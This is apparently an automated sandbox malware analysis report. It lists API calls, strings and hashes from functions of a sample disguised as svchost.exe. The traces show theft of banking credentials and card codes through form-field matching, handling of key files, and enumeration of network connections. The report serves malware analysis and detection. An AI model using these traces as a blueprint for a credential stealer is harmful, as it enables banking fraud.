                                                                                                                                                                                                              Function 02C99ED0 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C99EE8
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 02C99EF3
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 02C99EFE
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowLongA.USER32(02C9CE3A,000000F0), ref: 02C9E26B
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetLastActivePopup.USER32(02C9CE3A), ref: 02C9E279
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000005), ref: 02C9E293
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000), ref: 02C9E296
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowInfo.USER32(00000000,?), ref: 02C9E2AC
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000004), ref: 02C9E2B5
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000003), ref: 02C9E2EE
                                                                                                                                                                                                              • GetLastActivePopup.USER32(00000000), ref: 02C99F31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveLastPopup$IconicInfoLongVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3661365765-0
                                                                                                                                                                                                              • Opcode ID: 7c5de74cdbd6f7b487a9dd045c87d9c79ab4c366df4021cc7d56479743485f9e
                                                                                                                                                                                                              • Instruction ID: 78821b0810c34159bc0c37a1cd3e2997fc11159c804b45556b6956f811797b44
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c5de74cdbd6f7b487a9dd045c87d9c79ab4c366df4021cc7d56479743485f9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5701A232304201978F106B6A988CF3EB3EDEBD9A86348052DF505D3240EB75D5429A62
                                                                                                                                                                                                              Function 02C94180 Relevance: 98.3, APIs: 42, Strings: 14, Instructions: 300memoryfilenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,74DF3490), ref: 02C9419D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C941A0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C941B4
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C94224
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94232
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C94235
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94242
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C94245
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02C9425D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C94260
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C94270
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C9428A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94297
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9429A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C942AB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C942AE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 02C942DA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C942DD
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C942F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02C94346
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9434D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C9435E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C94365
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02C9439D
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02C943B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C943C8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C943DA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C943DD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C943EA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C943ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C943F9
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C943FC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C94409
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C9440C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(02C958F7,00000000,00000000,00000001), ref: 02C9446E
                                                                                                                                                                                                              • LockFile.KERNEL32(02C958F7,00000000,00000000,00000001,00000000), ref: 02C9447E
                                                                                                                                                                                                              • WriteFile.KERNEL32(02C958F7,00000000,00000001,00000000,00000000), ref: 02C9448D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(02C958F7,02C958F7,00000000,00000001,00000000), ref: 02C9449D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C944AC
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C944AF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C944BC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C944BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                              • API String ID: 2439004899-2402783461
                                                                                                                                                                                                              • Opcode ID: d5fccf58d0bd27b020f31835395eae38edcbf5ffcbe69dbf40687083d215e2a7
                                                                                                                                                                                                              • Instruction ID: 5a00dd510ed9ebb4bc1474375d4d46076b576ed280fe895a4ca8055c1178cdd4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5fccf58d0bd27b020f31835395eae38edcbf5ffcbe69dbf40687083d215e2a7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06A1D2B1E41214ABDB249FA49C4CFAF7FB8EB85785F948648F905EB240DB709505CBA0
                                                                                                                                                                                                              Function 02CB0810 Relevance: 93.1, APIs: 46, Strings: 7, Instructions: 383memorysleepstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0830
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c402d), ref: 02CB0857
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB0895
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB089F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB08A7
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB08B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB08C0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CB08FC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CB090A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c402d,?,?), ref: 02CB0945
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB097F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB0989
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB0991
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB09A0
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB09A7
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CB09D5
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB0A00
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0A4B
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02CB0A65
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0AA8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02CB0AC2
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,02CDA5BC,00000002,?,?,?), ref: 02CB0AE7
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0B2A
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02CB0B44
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02CB0B69
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CB0BA1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02CB0BA4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CB0BB0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02CB0BB3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02CB0BC0
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB0BE6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02CB0C08
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02CB0C23
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 02CB0C2E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?), ref: 02CB0C39
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02CB0C40
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02CB0C50
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB0C62
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02CB0C8F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02CB0C92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CB0C9F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02CB0CA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02CB0CAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02CB0CAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02CB0CBF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02CB0CC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                              • String ID: Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$S:(ML;;NRNWNX;;;LW)$a23c402d$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                              • API String ID: 1233543684-937037955
                                                                                                                                                                                                              • Opcode ID: 762560671f73411cd78831aa1410076f4461d690fb57c14dccf32892ffb7eac7
                                                                                                                                                                                                              • Instruction ID: ffba9dcab9b9c6cfca194c7670e3af4b6e23ab42d9da4f9edfad931cfaa61a29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 762560671f73411cd78831aa1410076f4461d690fb57c14dccf32892ffb7eac7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D1E270985341AFEB229B64D848FEB7BE8FF89745F444A18F585C7140EB70D618CBA1
                                                                                                                                                                                                              Function 02CA89D0 Relevance: 91.4, APIs: 37, Strings: 15, Instructions: 400threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA89F2
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,02CA0BE3,?,?,?), ref: 02CA8A0F
                                                                                                                                                                                                                • Part of subcall function 02CA4170: GetProcessHeap.KERNEL32(00000008,00000016,75A8EA50,C:\Windows\apppatch\svchost.exe,02CB4A9E), ref: 02CA4181
                                                                                                                                                                                                                • Part of subcall function 02CA4170: HeapAlloc.KERNEL32(00000000), ref: 02CA4188
                                                                                                                                                                                                                • Part of subcall function 02CA4170: memset.MSVCRT ref: 02CA4198
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA8A35
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,74DEF380,00000000,00000001,00000000,?,?,?,02CA8A44,?,?,?,?,?), ref: 02CAE433
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE441
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE44D
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE45B
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE467
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE479
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: strstr.MSVCRT ref: 02CAE48F
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: strstr.MSVCRT ref: 02CAE4A2
                                                                                                                                                                                                                • Part of subcall function 02CAE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02CAE50B
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: strstr.MSVCRT ref: 02CB44DC
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: strstr.MSVCRT ref: 02CB44EF
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: strstr.MSVCRT ref: 02CB4502
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: PathAddBackslashA.SHLWAPI(02CED2A0), ref: 02CB4528
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: PathAddBackslashA.SHLWAPI(02CED2A0), ref: 02CB4562
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02CB45CD
                                                                                                                                                                                                                • Part of subcall function 02CB44A0: GetLastError.KERNEL32 ref: 02CB45D7
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: strstr.MSVCRT ref: 02CB1A83
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: strstr.MSVCRT ref: 02CB1A92
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: strstr.MSVCRT ref: 02CB1AA1
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1ACD
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: PathAddBackslashA.SHLWAPI(02CED4A8), ref: 02CB1B03
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02CB1B6C
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: GetLastError.KERNEL32 ref: 02CB1B76
                                                                                                                                                                                                                • Part of subcall function 02CB1A60: IsUserAnAdmin.SHELL32 ref: 02CB1B7E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02CA8A5C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02CA8A6C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D,?,?,?,?,?,?), ref: 02CA8A9D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,A23C419D,?,?,?,?,?,?), ref: 02CA8AAB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8AB8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D,?,?,?,?,?,?), ref: 02CA8ABF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02CA8B2E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af,?,?,?,?,?,?), ref: 02CA8B5D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,a23c41af,?,?,?,?,?,?), ref: 02CA8B6B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8B78
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af,?,?,?,?,?,?), ref: 02CA8B7F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02CA8BF3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02CA8C03
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02CA8C13
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4149,?,?,?,?,?,?), ref: 02CA8C3D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,A23C4149,?,?,?,?,?,?), ref: 02CA8C4B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8C58
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4149,?,?,?,?,?,?), ref: 02CA8C5F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02CA8CCF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093,?,?,?,?,?,?), ref: 02CA8CFD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,a23c4093,?,?,?,?,?,?), ref: 02CA8D0B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8D18
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093,?,?,?,?,?,?), ref: 02CA8D1F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02CA8D93
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015,?,?,?,?,?,?), ref: 02CA8DBD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,a23c4015,?,?,?,?,?,?), ref: 02CA8DCB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015,?,?,?,?,?,?), ref: 02CA8DD6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02CA8E43
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CECF94,?,?,?,?,?,?), ref: 02CA8E6D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,02CECF94,?,?,?,?,?,?), ref: 02CA8E7B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CECF94,?,?,?,?,?,?), ref: 02CA8E86
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3570,00000000,00000000,00000000), ref: 02CA8EE8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02CA0BE3,?,?,?,?,?,?), ref: 02CA8F00
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02CA8F11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                              • String ID: &LOGIN_AUTHORIZATION_CODE=$A23C4149$A23C419D$CryptoPluginId=AGAVA&Sign$a23c4015$a23c4093$a23c41af$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                              • API String ID: 4254156133-2192826705
                                                                                                                                                                                                              • Opcode ID: acb96d4a2835ff64478c3ac1bdeff364299244898b8a034c68a6483e286681a3
                                                                                                                                                                                                              • Instruction ID: b613699259d68b14f18f5af0028a63f499ebe5977ad7adfeac3414fa272ed883
                                                                                                                                                                                                              • Opcode Fuzzy Hash: acb96d4a2835ff64478c3ac1bdeff364299244898b8a034c68a6483e286681a3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00D18934E462259BDF21AB289C14BEB7FE8AF85704F084695ED89D7200CF709A45CFE1
                                                                                                                                                                                                              Function 02CA0940 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02CA0981
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0984
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA099E
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02CA09BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02CA09DF
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA09E2
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA09F7
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02CA0A0D
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02CA0A29
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02CA0A3C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02CA0A4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0A4F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0A6A
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02CA0A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02CA0AC9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0ACC
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0AE0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0AF0
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA0AFE
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA0B40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA0B6C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0B6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA0B7C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0B7F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0B8B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0B8E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0B9B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0B9E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0BB4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0BB7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0BC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0BC7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02CA0BE6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0BEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0BF8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0BFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0C07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0C0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0C13
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0C16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
